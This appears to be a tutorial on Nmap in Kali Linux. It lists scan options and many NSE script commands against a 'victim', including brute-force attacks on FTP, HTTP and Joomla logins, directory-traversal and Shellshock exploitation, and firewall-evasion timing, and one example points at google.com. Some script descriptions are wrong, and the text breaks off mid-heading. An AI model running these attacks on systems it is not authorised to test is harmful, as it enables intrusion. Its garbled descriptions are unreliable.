Full name of Nmap is network mapper .It a tool of kali Linux that is used to scan the system or network of the victim. It is also is used in reconnaissance. It is the best tool for the scanning and reconnaissance. It has many script for scanning and for brute force attack in it. It is number one tool of kali Linux that is used for information gathering and vulnerability analysis both in hacking. It is used by almost all hackers and cyber security researchers to scan a target. It is pre-installed in kali Linux so we can use it directly.
BASIC COMMAND OF NMAP:
Now we will discuss alt important command of the nmap.
TO SCAN A SINGLE IP ADDRESS IN SIMPLE WAY:
(nmap +ip of the victim) e.g. (nmap 192.168.8.4)
Output of nmap for single ip address
TO SCAN DOMAIN IN SIMPLE WAY:
(nmap +domain of website) e.g. (nmap nmap.org)
TO SCAN A NETWORK SIMPLY:
(nmap +network range) e.g. (nmap 192.168.8.0/24)
TO SCAN A SPECIFIC RANGE OF PORTS:
(nmap +ip of victim -p +range) e.g. (nmap 192.168.8.4 -p1-100)
TO SCAN A SINGLE PORT
(nmap +ip of victim -p+port number) e.g. (nmap 192.168.8.4 -p17 number)
TO SCAN TARGETS FROM A FILE:
(nmap -iL +path of list having targets) e.g. (nmap -iL /root/Deesktop/targets.txt)
TO SCAN A PORT OF SPECIFIC SERVICE:
(nmap +ip or domain of target -p +service) e.g. (nmap 192.168.8.4 -p http)
TO SCAN A PORT OF SPECIFIC PROTOCOL:
(nmap +ip of target -p protocol hint:port) e.g. (nmap 192.168.8.4 -p T:80)
TO SCAN ALL PORTS OF TARGET:
(nmap +ip of target -p-) e.g. (nmap 192.168.8.4 -p-)
TO SCAN SPECIFIC TOP PORTS:
(nmap +ip or domain --top-ports +numbers) e.g. (nmap 192.168.8.4 --top-ports 1000)
TO USE SYN SCAN:
(nmap +ip or domain -sS) e.g. (nmap 192.168.8.4 -sS)
TO USE ACK SCAN:
(nmap +ip or domain -sA) e.g. (nmap 192.168.8.4 -sA)
TO USE UDP SCAN:
(nmap +ip or domain of target -sU) e.g. (nmap 192.168.8.4 -sU)
TO USE TCP SCAN:
(nmap +ip or domain of website -sT) e.g. (nmap 192.168.8.4 -sT)
TO USE NULL SCAN:
(nmap -p+port number -sN +domain or ip) e.g. (nmap -p80 -sN 192.168.8.4)
TO USE HIGH SPEED SCANNING:
(nmap +ip or domain -p +port range -T4) e.g. (nmap 192.168.8.4 -p1-10000 -T4)
TO SET HOST TIMEOUT ANT SCAN DELAY TO BYPASS FIREWALL:
(nmap +domain or ip --host-timeout +time --scan-delay +time) e.g. (nmap 192.168.8.4 --host-timeout 3s --scan-delay 5s)
TO SAVE OUTPUT ABOUT TARGET IN A FILE:
(nmap +ip or domain or network range -oN +path of file to save) e.g. (nmap 192.168.8.4 –oN /root/Desktop/result.txt)
TO SEE SERVICES VERSIONS OF TARGET:
(nmap +ip or domain of target -sV) e.g. (nmap 192.168.8.4 -sV)
TO SEE THE OPERATING SYSTEM OF TARGET:
(nmap +IP or domain of target -O) e.g. (nmap 192.168.8.4 -O)
FOR COMPLETE AND FULL SCANNING:
(nmap +ip or domain of target -A) e.g. (nmap 192.168.8.4 -A)
FOR MORE DETAILED SCANNING OF ALL PORTS WITH SERVICES VERSIONS AND OS:
(nmap -A -p- +ip of the victim) e.g. (nmap -A -p- 192.168.8.4)
Output for complete scan
SCRIPTS:
Scripts are also specific command of nmap that are used for the scanning and brute force attack on different services. Some scripts are used for scanning, some are used for brute force attack on different protocols, some are used for vulnerability analysis and some are used for exploitation of specific vulnerabilities.
I discussed with some extra options in simple way for simple use but you can make them complex using different options for more powerful attack. You can also use two or more scripts in single command also. It depends upon your work but all the scripts are very powerful and important for different purposes.
Brute force attack, vulnerability analysis and exploitation are our separate topics but I am writing because these are parts of scripts of nmap.
One more thing is important that some scripts are used as (--script=+name of script), some are used as (--script +name of script).
Moreover you must use correct (port number) on which the specific service of your target is running. As ftp service runs on default port (21), http on (80) but it may be different for your victim.
I used here random ports as examples but you must use everything in correct way otherwise script will not run. So you must check different ports for different services of your victim.
These all script are present in folder (usr) in (share) in (nmap) in(script),so type the commands;
(cd usr/share/nmap/scripts)
(ls)
You can see all script. Now we will use different scripts.
TO PERFORM BRUTE FORCE ATTACK ON AFP SERVICE:
(nmap -p+port of afp --script=afp-brute +ip or domain of website) e.g.
(nmap -p45 --script=afp-brute 192.168.8.4)
TO GET USEFUL INFORMATION FROM AFP SERVICE FILES:
(nmap -sS -sV -p+port --script=afp-ls +domain or ip of target) e.g.
(nmap -sS -sV -p45 --script=afp-ls 192.168.8.4)
TO DISCOVER VULNERABILITY IN AFP SERVICE OF TARGET:
(nmap -sV --script=afp-path-vuln +domain or ip of target -p+port) e.g.
(nmap -sV --script=afp-path-vuln 192.168.8.4 -p45)
TO SHOW THE AFP SHARES OF TARGET:
(nmap -p+port of afp service --script=afp-showmount +domain or ip of target ) e.g.
(nmap -p45 of afp service --script=afp-showmount 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON AJP SERVICE:
(nmap -p+port --script=ajp-brute +domain or ip of target) e.g.
(nmap -p43 --script=ajp-brute 192.168.8.4)
TO DISCOVER AJP HEADERS OF TARGET:
(nmap -p+port +domain or ip of target --script=ajp-headers) e.g.
(nmap -p43 192.168.8.4 --script=ajp-headers)
TO SEE AJP SUPPORTED OPTIONS OF TARGET:
(nmap -p+port +domain or ip of target --script=ajp-methods) e.g.
(nmap -p43 192.168.8.4 --script=ajp-methods)
TO DETECT ALL SEEING EYE SERVICES OF TARGET:
(nmap +domain or ip of target --script=allseeingeye-info) e.g.
(nmap 192.168.8.4 --script=allseeingeye-info)
TO GATHER INFORMATION OF AMQP OF TARGET:
(nmap --script amqp-info -p+port +domain or ip of target ) e.g.
(nmap --script amqp-info -p49 192.168.8.4)
TO CHECK AUTH SERVER, WHICH IS SPOOFING REPLIES:
(nmap -sV --script=auth-spoof -p+port +domain or ip of target) e.g.
(nmap -sV --script=auth-spoof -p80 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON BACKORIFICE SERVICE OF TARGET:
(nmap -sU --scrip=backorifice-brute -p+port +domain or ip of target) e.g.
(nmap -sU --scrip=backorifice-brute -p47 192.168.8.4)
TO DISCOVR INFORMATION OF BACNET DEVICES OF TARGET
(nmap --script bacnet-info -sU -p+port +domain or ip of target) e.g.
(nmap --script bacnet-info -sU –p29 192.168.8.4)
TO DISCOVER BANNERS OF TARGET:
(nmap -sV --script=banner -p+port +domain or ip of target ) e.g.
(nmap -sV --script=banner -p80 192.168.8.4)
TO SEE BITCOIN SERVER FROM LIST:
(nmap --script=bitcoin-getaddr -p+port +domain or ip of target) e.g.
(nmap --script=bitcoin-getaddr -p444 192.168.8.4)
TO SEE INFORMATION OF BITCOIN SERVER OF TARGET:
(nmap --script=bitcoinrpc-info -p+port +domain or ip of target) e.g.
(nmap --script=bitcoinrpc-info -p444 192.168.8.4)
TO SEE THE INFORMATION OF TARGET DEVICE USING BJNP:
(nmap -sU --script bjnp-discover -p+port +domain or ip of target) e.g.
(nmap -sU --script bjnp-discover -p444 192.168.8.4)
TO DISCOVER ATA SERVERS ON ETHERNET CONNECTION:
(nmap --script broadcast-ataoe-discover -e +interface -p+port +domain or ip of target) e.g.
(nmap --script broadcast-ataoe-discover -e eth0 -p445 192.168.8.4)
TO DISCOVER HOSTS IN LOCAL NETWORK OF TARGET:
(nmap --script=broadcast-avahi-dos +domain or ip of target) e.g.
(nmap --script=broadcast-avahi-dos 192.168.8.4)
TO DISCOVER INFORMATION FROM BJNP SUPPORTING DEVICE:
(nmap --script broadcast-bjnp-discover -p+port +domain or ip of target) e.g.
(nmap --script broadcast-bjnp-discover -p42 192.168.8.4)
TO DISCOVER DB2 SERVER ON NETWORK:
(nmap --script db2-discover -p+port +domain or ip of target) e.g.
(nmap --script db2-discover -p80 192.168.8.4)
TO DISCOVER HOSTS SERVICES USING DNS SERVICE DISCOVERY PROTOCOL:
(nmap --script=broadcast-dns-service-discovery -p+port +domain or ip of target) e.g.
(nmap --script=broadcast-dns-service-discovery -p80 192.168.8.4)
TO DISCOVER USEFUL INFORMATION OF TARGET:
(nmap --script=broadcast-dropbox-listener -p+port +domain or ip of target) e.g.
(nmap --script=broadcast-dropbox-listener -p80,8080 192.168.8.4)
TO DISCOVER TARGETS HAVING IGMP MULTICAST MEMBERSHIP:
(nmap --script broadcast-igmp-discovery -e +interface -p+port +domain or ip of target) e.g.
(nmap --script broadcast-igmp-discovery -e eth0 -p81 192.168.8.4)
TO SNIF THE NETWORK FOR INCOMING BROADCAST COMMUNICATION:
(nmap --script broadcast-listener -e +interface -p+port +domain or ip of target) e.g.
(nmap --script broadcast-listener -e eth0 -p80 192.168.8.4)
TO DISCOVER MS SQL SERVER OF TARGET:
(nmap --script broadcast-ms-sql-discover +domain or ip of target) e.g.
(nmap --script broadcast-ms-sql-discover 192.168.8.4)
TO DISCOVER MASTER BROWSER AND MAIN DOMAINS:
(nmap --script=broadcast-netbios-master-browser -p+port +domain or ip of target ) e.g.
(nmap --script=broadcast-netbios-master-browser -p80 192.168.8.4)
TO DISCOVER EMC NETWORK BACKUP SOFTWARE OF TARGET:
(nmap --script broadcast-networker-discover -p+port +domain or ip of target) e.g.
(nmap --script broadcast-networker-discover -p80 192.168.8.4)
TO DISCOVER NCP SERVERS:
(nmap -sV --script=broadcast-novell-locate -p+port +domain or ip of target ) e.g.
(nmap -sV --script=broadcast-novell-locate -p80,8081 192.168.8.4)
TO DISCOVER PC-ANYWHERE HOSTS ON LAN OF TARGET:
(nmap --script broadcast-pc-anywhere -p+port +domain or ip of target) e.g.
(nmap --script broadcast-pc-anywhere -p80 192.168.8.4)
TO DISCOVER PPPOE OF TARGET:
(nmap --script broadcast-pppoe-discover -p+port +domain or ip of target ) e.g.
(nmap --script broadcast-pppoe-discover -p8081 192.168.8.4)
TO DISCOVER ROUTERS USING PIM:
(nmap --script broadcast-pim-discovery -e +interface -p+port +domain or ip of target) e.g.
(nmap --script broadcast-pim-discovery -e wlan0 -p80 192.168.8.4)
TO DISCOVER HOSTS AND DEVICES RUNNING RIP VERSION2 IN LAN:
(nmap --script broadcast-rip-discover -p+port +domain or ip of target) e.g.
(nmap --script broadcast-rip-discover -p80 192.168.8.4)
TO DISCOVER HOSTS AND DEVICES RUNNING RIPNG IN LAN:
(nmap --script broadcast-ripng-discover -p+port +domain or ip of target) e.g.
(nmap --script broadcast-ripng-discover -p80 192.168.8.4)
TO DISCOVER SYBASE ANYWHERE SERVER ON LAN:
(nmap --script broadcast-sybase-asa-discover -p+port +domain or ip of target) e.g.
(nmap --script broadcast-sybase-asa-discover -p80 192.168.8.4)
TO DISCOVER TELLDUS TECHNOLOGIEG TELLSTICKNET DEVICES ON LAN:
(nmap --script broadcast-tellstick-discover -p+port +domain or ip of target) e.g.
(nmap --script broadcast-tellstick-discover -p80 192.168.8.4)
TO COLLECT INFORMATION FROM UPNP SERVICE OF TARGET:
(nmap -sV --script=broadcast-upnp-info -p+port +domain or ip of target) e.g.
(nmap -sV --script=broadcast-upnp-info -p343 192.168.8.4)
TO DISCOVER VERSANT OBJECT DATABASE:
(nmap --script broadcast-versant-locate -p+port +domain or ip of target) e.g.
(nmap --script broadcast-versant-locate -p8080 192.168.8.4)
TO WAKE THE TAGET SYSTEM FROM SLEEP MODE:
(nmap --script broadcast-wake-on-lan -p+port +domain or ip of target) e.g.
(nmap --script broadcast-wake-on-lan -p80 192.168.8.4)
TO DISCOVER PROXIES SERVERS OF TARGET IN LAN:
(nmap --script broadcast-wpad-discover -p+port +domain or ip of target) e.g.
(nmap --script broadcast-wpad-discover -p80 192.168.8.4)
TO DISCOVER THE DEVICES SUPPORTING THE WEB SERVICES DYNAMIC DISCOVERY PROTOCOL:
(nmap --script broadcast-wsdd-discover -p+port +domain or ip of target) e.g.
(nmap --script broadcast-wsdd-discover -p80 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON CASSANDRA:
(nmap -p+port +domain or ip of target --script=cassandra-brute) e.g.
(nmap -p448 192.168.8.4 --script=cassandra-brute)
TO GET INFORMATION FROM CASSANDRA DATABASE:
(nmap -p+port +domain or ip of target --script=cassandra-info) e.g.
(nmap -p448 192.168.8.4 --script=cassandra-info)
TO DISCOVER APPLICATIONS FROM ICA BROWSER SERVICE:
(nmap -sU --script=citrix-enum-apps -p+port +domain or ip of target) e.g.
(nmap -sU --script=citrix-enum-apps -p80 192.168.8.4)
TO DISCOVER APPLICATIONS, ACLS AND SETTINGS FROM CITRIX XML SERVICE:
(nmap --script=citrix-enum-apps-xml -p+port +domain or ip of target) e.g.
(nmap --script=citrix-enum-apps-xml -p441 192.168.8.4)
TO DISCOVER CITRIX SERVERS FROM ICA BROWSER SERVICE:
(nmap -sU --script=citrix-enum-servers -p+port +domain or ip of target) e.g.
(nmap -sU --script=citrix-enum-servers -p80 192.168.8.4)
TO GET THE NAME OF SERVER FARM AND MEMBER SERVERS FROM CITRIX XML SERVICE:
(nmap --script=citrix-enum-servers-xml -p+port +domain or ip of target) e.g.
(nmap --script=citrix-enum-servers-xml -p80 192.168.8.4)
TO GET DATABASE TABLES FROM COUCHDB DATABASE:
(nmap --script couchdb-databases.nse -p+port +domain or ip of target) e.g.
(nmap --script couchdb-databases.nse -p554 192.168.8.4)
TO GET DATABASE STATICS FROM COUCHDB DATABASE:
(nmap --script couchdb-stats.nse -p+port +domain or ip of target) e.g.
(nmap --script couchdb-stats.nse -p554 192.168.8.4)
TO GET THE LIST OF PRINTERS THAT USE CUPS PRINTING SERVICE:
(nmap --script cups-info -p+port +domain or ip of target) e.g.
(nmap --script cups-info -p555 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON CVS PSERVER AUTHENTICATION:
(nmap --script cvs-brute -p+port +domain or ip of target) e.g.
(nmap --script cvs-brute -p557 192.168.8.4)
TO DISCOVER THE NAME OF CVS REPOSITORIES OF TARGET:
(nmap --script cvs-brute-repository -p+port +domain or ip of target) e.g.
(nmap --script cvs-brute-repository -p80 192.168.8.4)
TO GET LIST OF MUSIC FROM DAAP ERVER OF TARGET:
(nmap -sV --script=daap-get-library -p+port +domain or ip of target) e.g.
(nmap -sV --script=daap-get-library -p559 192.168.8.4)
TO DISCOVER DHCP OF TARGET:
(nmap -sU --script=dhcp-discover -p+port +domain or ip of target) e.g.
(nmap -sU --script=dhcp-discover -p80 192.168.8.4)
TO PERFORM DOMAIN LOOKUP:
(nmap -sU --script dns-client-subnet-scan -p+port +domain or ip of target) e.g.
(nmap -sU --script dns-client-subnet-scan -p80 192.168.8.4)
TO PERFORM DNS FUZZING ATTACK ON DNS SERVER:
(nmap -sU --script dns-fuzz -p+port +domain or ip of target) e.g.
(nmap -sU --script dns-fuzz -p80 192.168.8.4)
TO DISCOVER DNS NAMES USING DNS-SEC NSEC-WALKING TECHNIQUE:
(nmap -sSU --script dns-nsec-enum -p+port +domain or ip of target) e.g.
(nmap -sSU --script dns-nsec-enum -p80 192.168.8.4)
TO DISCOVER DNS NAMES USING DNSSEC NSEC3-WALKING TECHNIQUE:
(nmap -sU --script=dns-nsec3-enum -p+port +domain or ip of target) e.g.
(nmap -sU --script=dns-nsec3-enum -p80 192.168.8.4)
TO GET INFORMATION FROM DNS NAMESERVERS BY NSID:
(nmap --script dns-nsid -p+port +domain or ip of target) e.g.
(nmap --script dns-nsid -p80 192.168.8.4)
TO CHECK DNS SERVER BY VULNERABLE PORT:
(nmap -sU --script=dns-random-srcport -p+port +domain or ip of target) e.g.
(nmap -sU --script=dns-random-srcport -p80 192.168.8.4)
TO CHECK DNS BY TXID VULNERABILITY:
(nmap -sU --script=dns-random-txid -p+port +domain or ip of target) e.g.
(nmap -sU --script=dns-random-txid -p80 192.168.8.4)
TO DISCOVER VARIOUS COMMON SERVICE RECORDS:
(nmap --script dns-srv-enum -p+port +domain or ip of target) e.g.
(nmap --script dns-srv-enum -p80 192.168.8.4)
TO PERFORM DYNAMIC DNS UPDATE WITHOUT AUTHENTICATION:
(nmap -sU --script=dns-update -p+port +domain or ip of target) e.g.
(nmap -sU --script=dns-update -p80 192.168.8.4)
TO REQUEST A ZONE TRANSFER FROM DNS SERVER:
(nmap --script=dns-zone-transfer -p+port +domain or ip of target) e.g.
(nmap --script=dns-zone-transfer -p80 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON LOTUS DOMINO CONSOLE:
(nmap --script domcon-brute -p+port +domain or ip of target) e.g.
(nmap --script domcon-brute -p80 192.168.8.4)
TO RUN CONSOLE ON LOTUS DOMINO CONSOLE USING DOMCON USERNAME AND PASSWORD:
(nmap -p+port +domain or ip of target --script domcon-cmd) e.g.
(nmap -p80 192.168.8.4 --script domcon-cmd)
TO DISCOVER USERS OF LOTUS DOMINO CONSOLE:
(nmap --script domino-enum-users -p+port +domain or ip of target) e.g.
(nmap --script domino-enum-users -p80 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON IPHOTO LIBRARY:
(nmap --script dpap-brute -p+port +domain or ip of target) e.g.
(nmap --script dpap-brute -p90 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON DRDA:
(nmap --script drda-brute -p+port +domain or ip of target) e.g.
(nmap --script drda-brute -p1100 192.168.8.4)
TO DISCOVER PROCESSES INFORMATION FROM APPLE REMOTE EVENT PROTOCOL:
(nmap -p+port +domain or ip of target --script eppc-enum-processes) e.g.
(nmap -p467 192.168.8.4 --script eppc-enum-processes)
TO DISCOVER FREELANCER GAME SERVER:
(nmap -sU --script=freelancer-info -p+port +domain or ip of target) e.g.
(nmap -sU --script=freelancer-info -p80 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON FTP SERVICE OF TARGET:
(nmap --script ftp-brute -p+port +domain or ip of target) e.g.
(nmap --script ftp-brute -p21 192.168.8.4)
TO CHECK CVE-2010-1938 VULNERABILITY IN FTP SERVICE:
(nmap -sV --script=ftp-libopie -p+port +domain or ip of target) e.g.
(nmap -sV --script=ftp-libopie -p21 192.168.8.4)
TO DISCOVER INFORMATION OF OPERATING SYSTEM OF TARGET:
(nmap --script ganglia-info +domain or ip of target) e.g.
(nmap --script ganglia-info 192.168.8.4)
TO CHECK GPS TIME AND SOME OTHER INFORMATION:
(nmap -p+port +domain or ip of target --script gpsd-info) e.g.
(nmap -p80 192.168.8.4 --script gpsd-info)
TO GET INFORMATION FROM APACHE HBASE MASTER:
(nmap --script hbase-master-info -p+port +domain or ip of target) e.g.
(nmap --script hbase-master-info -p80 192.168.8.4)
TO GET INFORMATION FROM APACHE HBASE REGION:
(nmap --script hbase-region-info -p+port +domain or ip of target) e.g.
(nmap --script hbase-region-info -p80 192.168.8.4)
TO GET THE DETAILS OF HARDWARES ON HNAP:
(nmap --script hnap-info -p+port +domain or ip of target) e.g.
(nmap --script hnap-info -p1250 192.168.8.4)
TO CHECK ADOBE COLDFUSION SERVER VULNERABILITY TO GET ADMIN SESSION COOKIE:
(nmap -sV --script http-adobe-coldfusion-apsa1301 -p+port +domain or ip of target) e.g.
(nmap -sV --script http-adobe-coldfusion-apsa1301 -p80 192.168.8.4)
TO DISCOVER AFFILIATE NETWORK IDS FROM A WEB PAGE:
(nmap --script=http-affiliate-id.nse -p+port +domain or ip of target) e.g.
(nmap --script=http-affiliate-id.nse -p80 www.google.com)
TO CHECK THE APACHE NEGOTIATION ENABLING:
(nmap --script=http-apache-negotiation -p+port +domain or ip of target) e.g.
(nmap --script=http-apache-negotiation -p80 192.168.8.4)
TO CHECK THE AUTHENTICATION SCHEME OF TARGET WEBSITE SERVICE:
(nmap --script http-auth -p+port +domain or ip of target) e.g.
(nmap --script http-auth -p80 vulnweb.com)
TO FIND TARGET WEB PAGES HAVING FORM-BASED OR HTTP-BASED AUTHENTICATION:
(nmap --script http-auth-finder -p+port +domain or ip of target) e.g.
(nmap --script http-auth-finder -p80 192.168.8.4)
TO FIND USERS IN AVAYA IP OFFICE SYSTEM 7.X:
(nmap --script http-avaya-ipoffice-users -p+port +domain or ip of target) e.g.
(nmap --script http-avaya-ipoffice-users -p80,8083 192.168.8.4)
TO EXPLOIT DIRECTORY TRAVERSAL VULNERABILITY IN APACHE AXIS2 VERSION 1.4.1:
(nmap --script http-axis2-dir-traversal -p+port +domain or ip of target) e.g.
(nmap --script http-axis2-dir-traversal -p80 192.168.8.4)
TO FIND BACKUP COPIES OF DISCOVERDED FILES:
(nmap --script=http-backup-finder -p+port +domain or ip of target) e.g.
(nmap --script=http-backup-finder -p80 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON HTTP SERVICE:
(nmap --script http-brute -p+port +domain or ip of target) e.g.
(nmap --script http-brute -p80 192.168.8.4)
TO DISCOVER CAKEPHP VERSION OF TARGET WEBSITE:
(nmap --script http-cakephp-version -p+port +domain or ip of target) e.g.
(nmap --script http-cakephp-version -p83 192.168.8.4)
TO FIND TIME DURATION FOR TARGET WEBSITE SERVICE:
(nmap --script http-chrono -p+port +domain or ip of target) e.g.
(nmap --script http-chrono -p80 vulnweb.com)
TO EXTRACT HTML, JAVASCRIPT COMMENTS FROM HTTP RESPONSE OF WEBSITE:
(nmap --script http-comments-displayer.nse -p+port +domain or ip of target) e.g.
(nmap --script http-comments-displayer.nse -p80 192.168.8.4)
TO CHECK BACKUP AND SWAP FILES OF CMS AND SERVER CONFIGURATION:
(nmap --script=http-config-backup -p+port +domain or ip of target) e.g.
(nmap --script=http-config-backup -p80 192.168.8.4)
TO CHECK CROSS-DMAIN POLICY FILE AND CLIENT-ACCESS POLICY FILE:
(nmap --script http-cross-domain-policy -p+port +domain or ip of target) e.g.
(nmap --script http-cross-domain-policy -p80 192.168.8.4)
TO CHECK CSRF VULNERABILITIES IN TARGET WEBSITE:
(nmap --script http-csrf.nse -p+port +domain or ip of target) e.g.
(nmap --script http-csrf.nse -p80 192.168.8.4)
TO DETECT A FIRMWARE BACKDOOR ON SOME D-LINK ROUTERS OF TARGET:
(nmap -sV --script http-dlink-backdoor -p+port +domain or ip of target) e.g.
(nmap -sV --script http-dlink-backdoor -p80 vulnweb.com)
TO DISCOVER INSTALLED DRUPAL MODULES OR THEMES IN TARGET:
(nmap --script http-drupal-enum -p+port +domain or ip of target) e.g.
(nmap --script http-drupal-enum -p80 192.168.8.4)
TO DISCOVER DIRECTORIES USED BY WEBSITE AND SERVER:
(nmap -sV --script=http-enum -p+port +domain or ip of target) e.g.
(nmap -sV --script=http-enum -p80 vulnweb.com)
TO DETECT ERROR PAGES OF WEBSITE:
(nmap --script http-errors.nse -p+port +domain or ip of target) e.g.
(nmap --script http-errors.nse -p80 192.168.8.4)
TO EXTRACT INTERESTING DATA HIDDEN IN IMAGE FILES OF WEB SERVER:
(nmap --script http-exif-spider -p+port +domain or ip of target) e.g.
(nmap --script http-exif-spider -p80 192.168.8.4)
TO FIND RSS OR ATOM FEEDS OF TARGET WEBSITE:
(nmap --script http-feed.nse -p+port +domain or ip of target) e.g.
(nmap --script http-feed.nse -p80 192.168.8.4)
TO FETCH FILES FROM SERVERS OF TARGET WESITE:
(nmap --script http-fetch -p+port +domain or ip of target) e.g.
(nmap --script http-fetch -p80 192.168.8.4)
TO EXPLOIT INSECURE FILE UPLOAD FORMS OF TARGET WEBSITE:
(nmap --script http-fileupload-exploiter.nse -p+port +domain or ip of target) e.g.
(nmap --script http-fileupload-exploiter.nse -p80 vulnweb.com)
TO PERFORM BRUTE FORCE ATTACK ON HTTP FORM BASED AUTHENTICATION OF TARGET WEBSITE:
(nmap --script http-form-brute -p+port +domain or ip of target) e.g.
(nmap --script http-form-brute -p80 vulnweb.com)
TO PERFORM FUZZING ON FORMS OF TARGET WEBSITE:
(nmap --script http-form-fuzzer -p+port +domain or ip of target) e.g.
(nmap --script http-form-fuzzer -p80 vulnweb.com)
TO GET LIST OF GIT PROJECTS OF TARGET WEBSITE:
(nmap --script http-gitweb-projects-enum -p+port +domain or ip of target) e.g.
(nmap --script http-gitweb-projects-enum -p80 192.168.8.4)
TO DETECT HUAWEI MODEMS MODELS RUNNING ON TARGET WEBSITE:
(nmap --script http-huawei-hg5xx-vuln -p+port +domain or ip of target) e.g.
(nmap --script http-huawei-hg5xx-vuln -p80 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON 8.3 FILENAMES:
(nmap --script http-iis-short-name-brute -p+port +domain or ip of target) e.g.
(nmap --script http-iis-short-name-brute -p80 192.168.8.4)
TO FIND VULNERABILITY IN HS 5.1 OR 6.0 VERSIONS:
(nmap --script http-iis-webdav-vuln -p+port +domain or ip of target) e.g.
(nmap --script http-iis-webdav-vuln -p80 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON JOOMLA CMS INSTALLATION:
(nmap -sV --script http-joomla-brute -p+port +domain or ip of target) e.g.
(nmap -sV --script http-joomla-brute -p80 192.168.8.4)
TO EXPLOIT VULNERABILITY OF NULL-BYTE POISONING IN WEB SERVERS 4.0.X:
(nmap --script http-litespeed-sourcecode-download -p+port +domain or ip of target) e.g.
(nmap --script http-litespeed-sourcecode-download -p80 192.168.8.4)
TO SHOW CONTENT OF INDEX PAGE OF TARGET WEBSITE:
(nmap -n --script http-ls -p+port +domain or ip of target) e.g.
(nmap -n --script http-ls -p80 192.168.8.4)
TO EXPLOIT TRAVERSAL VULNERABLITY IN MAJORDOMO2 OF TARGET WEBSITE:
(nmap --script http-majordomo2-dir-traversal -p+port +domain or ip of target) e.g.
(nmap --script http-majordomo2-dir-traversal -p80 192.168.8.4)
TO BYPASS PASSWORD PROTECTED RESOURCES OF TARGET WEBSITE:
(nmap -sV --script http-method-tamper -p+port +domain or ip of target) e.g.
(nmap -sV --script http-method-tamper -p80 vulnweb.com)
TO FIND OPTIONS SUPPORTED BY HTTP SERVER OF TARGET WEBSITE:
(nmap --script http-methods -p+port +domain or ip of target) e.g.
(nmap --script http-methods -p80 192.168.8.4)
TO CHECK THE PRESENCE OF MOBILE VERSION IN TARGET WEBSITE:
(nmap --script http-mobileversion-checker.nse -p+port +domain or ip of target) e.g.
(nmap --script http-mobileversion-checker.nse -p80 192.168.8.4)
TO FIND INFORMATION FROM HTTP SERVER USING NTLM AUTHENTICATION:
(nmap --script http-ntlm-info -p+port +domain or ip of target) e.g.
(nmap --script http-ntlm-info -p80 192.168.8.4)
TO CHECK OPENING OF HTTP PROXY IN TARGET WEBSITE:
(nmap --script http-open-proxy.nse -p+port +domain or ip of target) e.g.
(nmap --script http-open-proxy.nse -p8080 192.168.8.4)
TO FIND OPEN REDIRECTIONS OF TARGET WEBSITE:
(nmap --script=http-open-redirect -p+port +domain or ip of target) e.g.
(nmap --script=http-open-redirect -p80 vulnweb.com)
TO CHECK /ETC/PASSWD OR \BOOT.INI VULNERABILITY IN TARGET WEBSITE:
(nmap --script http-passwd -p+port +domain or ip of target) e.g.
(nmap --script http-passwd -p80 192.168.8.4)
TO CHECK PHP VERSION OF TARGET WEBSITE:
(nmap -sV --script=http-php-version -p+port +domain or ip of target) e.g.
(nmap -sV --script=http-php-version -p80 vulnweb.com)
TO EXPLOIT TRAVERSAL VULNERABILITY IN PHPMYADMIN DIRECTORY VERSION 2.6.4-PL1:
(nmap --script http-phpmyadmin-dir-traversal -p+port +domain or ip of target) e.g.
(nmap --script http-phpmyadmin-dir-traversal -p80 192.168.8.4)
TO CHECK REFLECTED CROSS SITE SCRIPTING VULNERABLE PHP FILES OF TARGET WEBSITE:
(nmap -sV --script http-self-xss -p+port +domain or ip of target) e.g.
(nmap -sV --script http-self-xss -p80 192.168.8.4)
TO PERFORM BRUTE FORCE ATTACK ON HTTP PROXY SERVER OF TARGET WEBSITE:
(nmap --script http-proxy-brute -p+port +domain or ip of target) e.g.
(nmap --script http-proxy-brute -p8080 192.168.8.4)
TO GET INFORMATION FROM QNAP NETWORK OF TARGET WEBSITE:
(nmap --script http-qnap-nas-info -p+port +domain or ip of target) e.g.
(nmap --script http-qnap-nas-info -p80 vulnweb.com)
TO CHECK PRESENCE OF EXTERNAL JAVASCRIPT SCRIPTS IN TARGET WEBSITE:
(nmap --script http-referer-checker.nse -p+port +domain or ip of target) e.g.
(nmap --script http-referer-checker.nse -p80 192.168.8.4)
TO CHECK DISALLOWED ENTERIES IN /ROBOTS.TXT FILE OF WEB SERVER:
(nmap --script http-robtex-reverse-ip -p+port +domain or ip of target) e.g.
(nmap --script http-robtex-reverse-ip -p80 192.168.8.4)
TO CHECK SIMILAR NAMED WEBSITES TO OUR TARGET WEBSITE:
(nmap --script http-robtex-shared-ns -p+port +domain or ip of target) e.g.
(nmap --script http-robtex-shared-ns -p80 192.168.8.4)
TO EXPLOIT SHELLSHOCK VULNERABILITY IN TARGET WEBSITE:
(nmap -sV -p- --script http-shellshock -p+port +domain or ip of target) e.g.
(nmap -sV -p- --script http-shellshock -p80 192.168.8.4)
TO SEE THE STRUCTURE OF DIRECTORIES OF WEBSITE AND TYPES OF FILES:
(nmap --script http-sitemap-generator -p+port +domain or ip of target) e.g.
(nmap --script http-sitemap-generator -p80 192.168.8.4)
TO CHECK SLOWLORIS DOS ATTACK VULNERABILITY IN TARGET WEBSITE:
(nmap --script http-slowloris-check -p+port +domain or ip of target) e.g.
(nmap --script http-slowloris-check -p80 192.168.8.4)
TO CHECK SQL INJECTION VULNERABLE LINKS OF TARGET WEBSITE:
(nmap -sV --script=http-sql-injection -p+port +domain or ip of target) e.g.
(nmap -sV --script=http-sql-injection -p80 vulnweb.com)
TO CHECK STORED XSS VULNERABILITY IN TARGET WEBSITE:
(nmap --script http-stored-xss.nse -p+port +domain or ip of target) e.g.
(nmap --script http-stored-xss.nse -p80 192.168.8.4)
TO FIND USERS OF SUBVERSION REPOSITORY OF TARGET WEBSITE:
(nmap --script http-svn-enum -p+port +domain or ip of target) e.g.
(nmap --script http-svn-enum -p80 192.168.8.4)
TO GET INFORMATION OF SUBVERSION REPOSITORY OF TARGET WEBSITE
